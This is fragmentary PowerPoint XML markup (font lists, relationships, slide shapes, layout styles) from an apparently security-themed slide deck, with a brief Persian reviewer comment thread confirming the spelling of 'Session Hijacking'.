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Lst>
  <p:sldSz cy="5143500" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="PT Sans Narrow"/>
      <p:regular r:id="rId118"/>
      <p:bold r:id="rId119"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans"/>
      <p:regular r:id="rId120"/>
      <p:bold r:id="rId121"/>
      <p:italic r:id="rId122"/>
      <p:boldItalic r:id="rId1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Erfan Tazimi"/>
  <p:cmAuthor clrIdx="1" id="1" initials="" lastIdx="2" name="Jadi Mirmiran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121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-bold.fntdata"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-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23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-boldItalic.fntdata"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-italic.fntdata"/><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font" Target="fonts/PTSansNarrow-regular.fntdata"/><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font" Target="fonts/PTSansNarrow-bold.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3-18T10:11:43.161">
    <p:pos x="6000" y="0"/>
    <p:text>منظور از Session Highjacking 
Session Hijacking ه؟</p:text>
  </p:cm>
  <p:cm authorId="1" idx="1" dt="2020-03-18T09:59:14.423">
    <p:pos x="6000" y="0"/>
    <p:text>بله بله بدون شک (:</p:text>
  </p:cm>
  <p:cm authorId="1" idx="2" dt="2020-03-18T09:59:37.627">
    <p:pos x="6000" y="0"/>
    <p:text>_Marked as resolved_</p:text>
  </p:cm>
  <p:cm authorId="0" idx="2" dt="2020-03-18T10:11:43.161">
    <p:pos x="6000" y="0"/>
    <p:text>_Re-opened_
ممنون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c6f919934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c6f9199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c6f919934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6f91993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9" name="Shape 709"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="710" name="Google Shape;710;g7f159edca2_2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7f159edca2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6" name="Shape 716"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="717" name="Google Shape;717;g4d5a676b6fad4cd4_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4d5a676b6fad4cd4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Google Shape;724;g4d5a676b6fad4cd4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4d5a676b6fad4cd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0" name="Shape 730"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="731" name="Google Shape;731;g4d5a676b6fad4cd4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4d5a676b6fad4cd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6" name="Shape 736"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="737" name="Google Shape;737;g4d5a676b6fad4cd4_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4d5a676b6fad4cd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g4d5a676b6fad4cd4_5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4d5a676b6fad4cd4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4d5a676b6fad4cd4_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4d5a676b6fad4cd4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5" name="Shape 755"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="756" name="Google Shape;756;g4d5a676b6fad4cd4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4d5a676b6fad4cd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2" name="Shape 762"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="763" name="Google Shape;763;g4d5a676b6fad4cd4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4d5a676b6fad4cd4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Google Shape;770;g4d5a676b6fad4cd4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4d5a676b6fad4cd4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1ad8d36f8_1_17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1ad8d36f8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6" name="Shape 776"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="777" name="Google Shape;777;g4d5a676b6fad4cd4_6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4d5a676b6fad4cd4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3" name="Shape 783"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="784" name="Google Shape;784;g4d5a676b6fad4cd4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4d5a676b6fad4cd4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b5142240c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b514224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593fc215d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93fc215d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b57d90342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b57d903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b57d90342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b57d903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5b57d90342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b57d903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b57d90342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b57d903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b57d90342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b57d9034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b57d90342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b57d9034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c6f919934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c6f9199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b57d90342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b57d9034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9ab454a9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9ab454a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9ab454a9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9ab454a9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9ab454a9d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9ab454a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9ab454a9d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9ab454a9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9ab454a9d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9ab454a9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c71c75730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c71c757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c71c75730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c71c7573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c71c75730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c71c7573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c71c75730_0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c71c7573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1ad8d36f8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1ad8d36f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c71c75730_0_4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c71c7573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c71c75730_0_1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c71c75730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c71c75730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c71c7573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c71c75730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c71c7573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c71c75730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c71c7573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ef390e36e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ef390e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effc6cb60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effc6cb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effc6cb60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effc6cb6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5effc6cb60_0_1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5effc6cb6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effc6cb60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effc6cb6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880c1a28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880c1a28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effc6cb60_0_2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5effc6cb6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5effc6cb60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5effc6cb6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effc6cb60_0_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5effc6cb6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effc6cb60_0_4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effc6cb6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5effc6cb60_0_5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5effc6cb6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5effc6cb60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effc6cb6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e969525b6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e969525b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f202d2d6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f202d2d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f2eaf379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f2eaf37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5f2eaf3791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5f2eaf37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1ad8d36f8_1_1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1ad8d36f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5f2eaf3791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5f2eaf379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f2eaf3791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5f2eaf379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g5f2eaf3791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5f2eaf379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5f2eaf3791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5f2eaf379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f2eaf3791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f2eaf379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5f202d2d61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5f202d2d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5f47e64c1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5f47e64c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33fb373a8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3fb373a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g5f47e64c1f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5f47e64c1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5f47e64c1f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5f47e64c1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1ad8d36f8_1_1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1ad8d36f8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5f47e64c1f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5f47e64c1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6069a25e5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6069a25e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6069a25e51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6069a25e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g78530df5097b4c45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78530df5097b4c4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6069a25e51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6069a25e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60ab4b9761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60ab4b97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60ab4b9761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60ab4b976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60ab4b9761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60ab4b976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g60ab4b9761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60ab4b97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60ab4b9761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60ab4b976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51ad8d36f8_1_1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51ad8d36f8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60ab4b9761_0_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60ab4b9761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75faa25638_1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75faa2563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75faa25638_1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75faa2563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6e2772606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6e277260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6e27726069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6e277260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3" name="Shape 553"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Google Shape;554;g6e27726069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6e2772606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7e4476331c_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7e4476331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6" name="Shape 566"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Google Shape;567;g7e4476331c_2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7e4476331c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g7e4476331c_2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7e4476331c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7e4476331c_2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7e4476331c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1ad8d36f8_1_16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1ad8d36f8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5" name="Shape 585"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="586" name="Google Shape;586;g7e4476331c_2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7e4476331c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7e4476331c_2_3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7e4476331c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g7e4476331c_2_3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7e4476331c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3" name="Shape 603"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604" name="Google Shape;604;g7e4476331c_2_4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7e4476331c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9" name="Shape 609"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="610" name="Google Shape;610;g7e4476331c_2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7e4476331c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5" name="Shape 615"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616" name="Google Shape;616;g7e4476331c_2_6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7e4476331c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1" name="Shape 621"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="622" name="Google Shape;622;g7e4476331c_2_6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7e4476331c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7" name="Shape 627"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Google Shape;628;g7e4476331c_2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7e4476331c_2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3" name="Shape 633"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="634" name="Google Shape;634;g7efe87b540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7efe87b5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g7efe87b540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7efe87b54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1ad8d36f8_1_1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1ad8d36f8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Google Shape;647;g7efe87b540_0_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7efe87b54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g7efe87b540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7efe87b54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Google Shape;659;g7efe87b540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7efe87b54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g7efe87b540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7efe87b54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7efe87b540_0_3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7efe87b54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7" name="Shape 677"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="678" name="Google Shape;678;g7efe87b540_0_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7efe87b54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3" name="Shape 683"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="Google Shape;684;g7efe87b540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7efe87b54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0" name="Shape 690"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="691" name="Google Shape;691;g7efe87b540_0_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2" name="Google Shape;692;g7efe87b54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6" name="Shape 696"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="Google Shape;697;g7efe87b540_0_5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7efe87b54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2" name="Shape 702"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="703" name="Google Shape;703;g7f159edca2_2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7f159edca2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37474F"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="62" name="Shape 62"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Google Shape;63;p13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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0" y="0"/>
            <a:ext cx="4568400" cy="5143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6795047" y="584570"/>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6795047" y="4415195"/>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7" name="Google Shape;67;p13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4895600" y="656926"/>
            <a:ext cx="3942600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68" name="Google Shape;68;p13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4895600" y="4487700"/>
            <a:ext cx="3942600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;69;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312850" y="1069200"/>
            <a:ext cx="3942600" cy="30051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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;70;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4891175" y="1069200"/>
            <a:ext cx="3942600" cy="3005100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr"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71" name="Google Shape;71;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72" name="Shape 72"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Google Shape;73;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694275" y="759163"/>
            <a:ext cx="959400" cy="959400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="F6F2D2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="75" name="Google Shape;75;p14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7490325" y="759163"/>
            <a:ext cx="959400" cy="959400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="F6F2D2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Google Shape;76;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841500" y="759174"/>
            <a:ext cx="5460900" cy="9594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sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Google Shape;77;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694275" y="2358750"/>
            <a:ext cx="3640800" cy="24828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78" name="Google Shape;78;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4808925" y="2358750"/>
            <a:ext cx="3640800" cy="2482800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-292100" lvl="1" marL="914400" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-292100" lvl="2" marL="1371600" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-292100" lvl="3" marL="1828800" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-292100" lvl="4" marL="2286000" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-292100" lvl="5" marL="2743200" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-292100" lvl="6" marL="3200400" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-292100" lvl="7" marL="3657600" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="○"/>
